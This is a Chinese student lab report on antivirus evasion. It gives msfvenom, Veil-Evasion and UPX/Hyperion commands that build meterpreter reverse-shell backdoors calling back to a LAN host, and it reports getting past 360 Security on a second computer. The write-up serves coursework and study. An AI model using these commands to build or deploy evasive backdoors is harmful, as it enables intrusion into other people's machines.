网络对抗技术 20165220 Exp3 免杀原理与实践

实验任务

1 正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧；

2 通过组合应用各种技术实现恶意代码免杀(1分)
（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

基础问题回答

（1）杀软是如何检测出恶意代码的？

一种检测是检测特征码，就是检测该代码是否含有恶意代码都含有的一段代码，只要包含这段代码就被认定是恶意代码；
还有一种是检测该代码执行时是否有异常的行为，比如打开异常端口、关闭防火墙等，若有这些异常行为，则认定为恶意代码。

（2）免杀是做什么？

免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广，其中包含反汇编、逆向工程、系统漏洞等黑客技术，所以难度很高，一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码，从而躲避了杀毒软件的查杀。

（3）免杀的基本方法有哪些？

有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法。

实验过程

正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

使用msf编码器msfvenom生成后门程序

实验二中生成过一个后门程序，gyh_backdoor.exe，把它放到virscan网站中扫描

不加处理的恶意代码能被绝大多数杀毒软件识别。注意这里好像不能带有数字，那样没办法上传扫描！

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.24.134 LPORT=5220 -f exe > met-encoded10.exe指令进行十次编码

将生成的后门程序使用virscan进行扫描

多次编码对免杀并没有太大效果，依旧能被绝大多数杀毒软件检测出来。

使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.24.134 LPORT=5220 x> 20165220_backdoor_java.jar指令，生成jar类型的后门程序。

使用msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.24.134 lport=5220 x> 20165220_backdoor.apk指令，生成Android后门程序，此时其为安装包。

使用veil指令，启用veil；

用use evasion命令进入Evil-Evasion

使用use c/meterpreter/rev_tcp.py指令，进入配置界面；

使用set LHOST 192.168.24.134指令和set LPORT 5220指令，设置反弹连接IP和端口；

输入generate指令，生成文件，再输入生成的playload的名字：playload5220

并使用virscan进行扫描。

还是一样的会被检查出来。

使用加壳工具生成后门程序

输入upx playload5220.exe -o playload5220_upx.exe指令，给生成的后门程序加壳；

使用virscan进行扫描。

进入目录/usr/share/windows-binaries/hyperion/中，输入wine hyperion.exe -v playload5220.exe playload5220_hyperion.exe指令，给生成的后门程序加壳；

使用virscan进行扫描。

使用shellcode编程生成后门程序

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.134 LPORT=5220 -f c指令，生成一段shellcode；

创建20165220.c文件，在其中输入：

输入i686-w64-mingw32-g++ 20165220.c -o 20165220.exe指令，编译运行；

老规矩

通过组合应用各种技术实现恶意代码免杀(1分)

• 使用MSF meterpreter生成shellcode，对生成的文件使用UPX加壳处理，尝试实现免杀。

• Windows上的杀毒软件为：360安全卫士 

即实现免杀完成！！！

用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

舍友主机360版本

 

免杀成功

回连成功！

离实战还缺些什么技术或步骤？

本次实验我们只是简单的对文件进行加壳隐藏特征码来免杀，但是现在的病毒库更新速度很快，应该学会结合多种技术来免杀，如结合加壳，更换编码，修改程序入口，隐藏恶意软件共有的行为等来进行免杀。

我们仍然需要不断进步，现在只掌握了一点皮毛而已。

实验遇到的问题及解决方法

在安装veil evasion的时候展开包一直失败

解决办法：输入代码

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

这个好像跟版本有关系，我的完美解决~

开启杀软能绝对防止电脑中恶意代码吗？

试验后肯定不行啊，制作shellcode、加壳等技术手段的综合，就可以达到免杀的目的，对于一些技术高超的人简直是轻而易举的

实践总结与体会

这次做完后表示再也不相信360这种的了，感觉很轻松就绕过了360的查杀，对于免杀真的有所了解跟体会，所以我们才要不断学习进步，才能越来越好吧~

因此以后下载软件要尽量从正版源下载，减少被植入后门的几率。有机会再多多留意这方面的知识~